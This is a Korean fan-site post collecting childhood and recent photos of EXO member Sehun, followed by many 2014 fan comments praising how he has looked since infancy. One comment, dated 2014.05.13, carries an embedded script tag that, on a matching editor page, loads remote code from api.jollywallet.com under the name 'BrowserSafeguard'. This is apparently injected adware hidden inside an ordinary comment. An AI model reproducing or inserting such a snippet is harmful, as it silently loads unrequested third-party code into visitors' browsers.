훈녀동

구글로 싹 모아서 올려본다!!!ㅋㅋㅋ 구글이란 참 무서운 사이트야 검색하면 다 나와

아무튼 세훈이는 못나본적이 단 한번도 없는 것 같아, 이렇게 놓고 보니까ㅎㅎㅎㅎㅎ
정말 우월 그 자체다ㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠ 세후나 떡볶이 먹어줘서 고마워♥

+) 16.05.05 오린이날 기념 업데이트 완료

• 훈녀 2014.04.05 15:52
    못생긴적이 한번도 없던 세훈이 ㅠㅠ
  • 훈녀 2014.04.06 21:12

ㅋㅋㅋㅋㅋ아 어떡해 너무 귀여워 오구오구 이렇게 모아서 보니까 내가 업고 키운거 같아

• 훈녀 2014.04.06 21:51

진짜루최고잘생겼어♥ ♥

• 훈녀 2014.04.07 10:21

진짜- 세후니 잘 자랐당...애기때부터 웃는 모습 지금 모습 그대로~~내 광대는 저절로 올라가고 ㅋㅋㅋ

• 훈녀 2014.04.08 09:00

오구오구 애기때부터 쭉 변함없이 이뻤지 우리 세훈이ㅠㅠㅠ이뻐 죽겠다 진짜 사랑해♥

• 훈녀 2014.04.08 11:15

너무 잘자랐다...정말ㅠㅠㅠ<3

• 훈녀 2014.04.11 06:42

와진짜 잘컸다우리세후니ㅠㅠㅠ아기사진봐ㅠㅠㅠㅠ진짜웃는거지금이랑판박이네ㅎㅎㅎㅎ 너무이쁘다♥

• 훈녀 2014.04.16 09:55

웃는게 하나도 안변했네ㅎㅎㅎ 잘자랐다

• 훈녀 2014.04.19 00:25

세후나ㅠㅠㅠㅠㅠㅠㅠ 어쩜 이렇게 한결같이 귀여워ㅠㅠㅠㅠㅠ

• 훈녀 2014.04.19 21:08

앞으로도 이렇게이쁘고멋있고 웃으면서 더쑥쑥크자 세후나♡♡♡♡♡♡♡사랑해♡

• 훈녀 2014.04.20 19:28
    세훈이는 진짜 굴욕 과사가 없어ㅜㅜㅜㅜ 모태미남ㅜㅜㅜ♡♡♡
  • 훈녀 2014.04.23 17:26
    굴욕이요? 굴욕이 뭐죠ㅠㅜㅠㅠ 오세훈 인생에 굴욕이란 없나봉가ㅠㅜㅜㅜㅜㅠ
  • 훈녀 2014.04.23 19:04

ㅠㅠㅠㅠ모미ㅠㅠㅠㅠ

ㅁ...r음이 압하...예쁜 세훈이를 불러줘........☆

• 훈녀 2014.04.24 00:06

몇번을 봐도 늘 새롭다... 이렇게 잘자라줘서 고마워 ㅠㅠㅠㅠㅠㅠㅠㅠ 진짜 너무 예뻐

• 훈녀 2014.05.03 09:39

살면서 한번도 못생긴 적이 없는 세니ㅠ.ㅠ 인생 혼자사는 세니ㅠㅠㅠㅠ 사랑해

• 훈녀 2014.05.03 15:44
    새삼 세후니 진짜 잘생긴걸 실감한다ㅠㅠㅠ 크흡 잘커줘서 고마워 세후나ㅠㅠㅠ
  • 훈녀 2014.05.04 13:56

진짜미모봐....반짝반짝하다ㅠㅠㅠㅠㅠㅠㅠ

• 훈녀 2014.05.05 18:24

왜이렇게 다 잘생긴거죠..?..♡

• 훈녀 2014.05.06 21:03

아이구세훈이~ 어렸을때부터 아주 미남이네 미남ㅠㅠ 이쁘다 이뻐ㅜㅜㅜ?

• 훈녀 2014.05.06 22:00

세훈이는 어렸을 때나 지금이나 변함없이 멋지고 귀엽다ㅜㅜ

• 훈녀 2014.05.06 23:38

잘자라줘서 고마워 세훈아 ㅜㅜ

• 훈녀 2014.05.07 00:55
    세훈이보면 어쩜 저렇게 고대로 자랐을까싶어ㅠㅠ
  • 훈녀 2014.05.07 17:19

아 귀여워ㅠㅠ 나도 저렇게 태어났으면...ㅠ

• 훈녀 2014.05.08 14:58

콧대 봐 콧대ㅠㅠ 세훈이 너는 정말 최고다ㅠㅠ 너무 멋져ㅠㅠ

• 훈녀 2014.05.08 22:24

모태미남 세훈이..어렸을때나 지금이나 너무 예쁘고 멋지다ㅠㅠㅠ잘자라줘서 고마워 세훈아

• 훈녀 2014.05.09 00:42

우와...세훈아..(털썩) 어쩜 저렇게 생겼지? 사람이야?ㅠㅠㅠㅠ 사람아니지 우리세훈이는.... 후.. 태어나줘서 고맙다..

• 훈녀 2014.05.09 00:44

세니........세훈아 정말 잘자라줬구나.............ㅎ 내가 못본 사진도 있었네 ㅎㅎㅎㅎㅎㅎ 잘보고 갑니다 총총.......

• 훈녀 2014.05.10 12:53

폰으로 줍줍했는데 또왔당..... 난 정말 애기 세훈이만 보면 막 도키도키하고... ㅠㅠ.... 애기 너무 이쁘자나..... 우리애기 못생김을 모르자나.... ㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠ

• 훈녀 2014.05.12 15:05

인스타에 세훈이 baby가 또 올라왔죠....세훈이 네 인생에 못생김이란 없구나.........ㅎ

• 훈녀 2014.05.12 16:41

요렇게 과사보니 정말 뿌듯해지는구나ㅠㅠㅠㅠㅠ 지금도 한없이 애기같은데 더 애기같던 시절이 잇구ㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠ 항상 멋잇고귀엽고 ㅠㅠㅠㅠㅠㅠㅠㅠㅠ 으악 다시한번 사랑해 후ㅏㄴ ㅠㅠㅠ

• 훈녀 2014.05.12 18:33

대박이다..진짜 과거랑 똑같애ㅋㅋㅋㅋㅋㅋㅋ

• 훈녀 2014.05.13 03:07

한번도 못생겨본적이 없는 세훈이ㅠㅠㅠㅠㅠ어쩜 굴욕 과사 하나도 없을 수가 있어ㅠㅠㅠ세훈아 인생 치트키 썼어?? <script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://welovesehun.com/xe/modules/editor/styles/default/editor.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script>

• 훈녀 2014.05.13 16:26

어쩜 과거사진이 저러니.. 모태미남.... 뀨..... 나의 과사는 봉인해제 금물인데....^^;;; 어릴 때도 이쁘고 귀엽고 잘생기고 아주 다 해먹네ㅠㅠ

• 훈녀 2014.05.15 04:21

어릴때부터 사진에 굴욕이 없었구나....어릴때 순둥순둥해가지고 진짜 귀여웠을 거 같애 ㅠㅠㅠㅠ 물론 지금도 애기애기 하지만 ㅎㅎㅎ

• 훈녀 2014.05.16 20:24

저렇게 태어나는 애도 진짜 있구나........ㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠ애깅이때랑 지금이랑(지금도 애깅이지만..!ㅠㅠ) 변한 게 없어ㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠ

• 훈녀 2014.05.16 20:50

어렸을때부터 남달랐다 우리세훈이ㅠㅠ

• 훈녀 2014.05.16 22:03

세훈이 너무 잘생겼다ㅠㅠ 못생김을 모른 우리 세훈이

• 훈녀 2014.05.17 01:56

애기세훈이 보고싶어서 다시왔는데 ㅎr 떡볶이사주고싶다

• 훈녀 2014.05.17 14:28
    ㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠ어릴때부터 후덜덜하다 대바기다 지쨔.........후나ㅠㅠㅠ
  • 훈녀 2014.05.17 17:57

어마어마한 얼굴이야!!변한게없어ㅠㅠ

• 훈녀 2014.05.18 14:04
    세니야 태어날때부터잘생긴기분은어때? ㅜㅠㅜㅜㅜ넌정말.... 으앙 세후나 너는...love...♡
  • 훈녀 2014.05.19 18:28

와........진짜 그대로 자랐어!!!!!!!! 우리 후니ㅠㅠㅠㅠㅠㅠㅠㅠㅠㅠ 훈아 보고싶다.........

• 훈녀 2014.05.22 08:11

ㅋㅋㅋㅋㅋㅋㅋㅋㅋ진짜 또오오오오오오옹옥같다 항상 사랑스러워 히후히힣힣 

• 훈녀 2014.05.25 02:02
    잘 커줘서 고마워 베이비 훈ㅜㅜ
  • 훈녀 2014.05.25 04:06

와 진짜 그대로 자랐네ㅠㅠ 사랑스러워ㅠㅠ♥

• 훈녀 2014.05.25 06:03
    범우주적 미남 오세훈ㅠㅠ 떡볶이 먹어줘서 넘 고마워ㅠㅠ
  • 훈녀 2014.05.25 13:30
    바람직해ㅠㅜㅠㅠㅠ 너무 바람직하게 자랐다 세훈 ㅠㅠㅠㅠㅠ고마워ㅠㅠㅠ엑소해줘서
  • 훈녀 2014.05.26 14:03

• 훈녀 2014.05.26 14:03

• 훈녀 2014.06.03 15:33
    귀여웡ㅋㅋㅋㅋㅋㅋㅋㅋ